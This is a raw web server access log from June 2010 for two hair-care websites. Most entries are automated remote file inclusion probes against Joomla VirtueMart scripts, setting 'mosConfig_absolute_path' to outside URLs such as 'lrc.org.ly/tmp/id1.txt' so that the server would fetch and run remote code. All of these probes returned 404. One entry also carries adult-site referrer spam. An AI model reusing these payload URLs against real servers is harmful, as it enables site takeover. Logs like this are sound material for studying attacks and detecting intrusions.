81.208.34.38 - - [07/Jun/2010:16:45:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:45:17 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:45:32 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:45:32 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:45:32 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:47:18 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:47:18 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:47:18 -0700] "GET /logs/access_100201.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:47:26 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:47:26 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:47:26 -0700] "GET /logs/access_100201.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:47:26 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:47:26 -0700] "GET /logs/access_100201.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:47:26 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:47:49 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:47:49 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:47:49 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [07/Jun/2010:16:48:09 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:48:09 -0700] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:48:09 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:48:14 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.105.210.185 - - [07/Jun/2010:16:48:41 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "[url=http://www.sexyrusgirls.com/?sid=16361] \xc7\xc0\xd0\xc0\xc1\xce\xd2\xc0\xc9 \xcb\xc8\xcc\xce\xcd \xc1\xc0\xca\xd1\xce\xc2[/url]" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]" "www.freehairsecrets.com"
193.105.210.185 - - [07/Jun/2010:16:48:41 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:48:52 -0700] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:48:52 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:48:52 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:49:00 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:00 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:00 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [07/Jun/2010:16:49:13 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:49:13 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:49:13 -0700] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:49:21 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:21 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:21 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:25 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:49:40 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:40 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:40 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:45 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:49:46 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:49 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:49 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:49 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:50 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:50 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:50 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:51 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:51 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:49:51 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [07/Jun/2010:16:50:21 -0700] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:50:21 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:50:21 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:50:29 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:50:29 -0700] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:50:29 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:50:35 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:50:35 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:50:35 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [07/Jun/2010:16:50:36 -0700] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:50:36 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:50:36 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:50:47 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:50:47 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:50:47 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:16:50:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=346 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:51:13 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:51:13 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:51:13 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:51:35 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:51:35 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:51:35 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:51:36 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:51:39 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:51:41 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:51:59 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:52:07 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:52:18 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:52:43 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:52:50 -0700] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:52:51 -0700] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:52:51 -0700] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:52:55 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:53:06 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:53:16 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:53:49 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:53:54 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:53:54 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:53:54 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:53:56 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:53:56 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:53:56 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:53:57 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:53:57 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:53:57 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:54:01 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:54:14 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:54:14 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:54:14 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:54:14 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:54:15 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:54:15 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:54:15 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:54:16 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:54:16 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:54:16 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:54:18 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:54:18 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:54:18 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:54:21 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:54:21 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:54:21 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:54:39 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
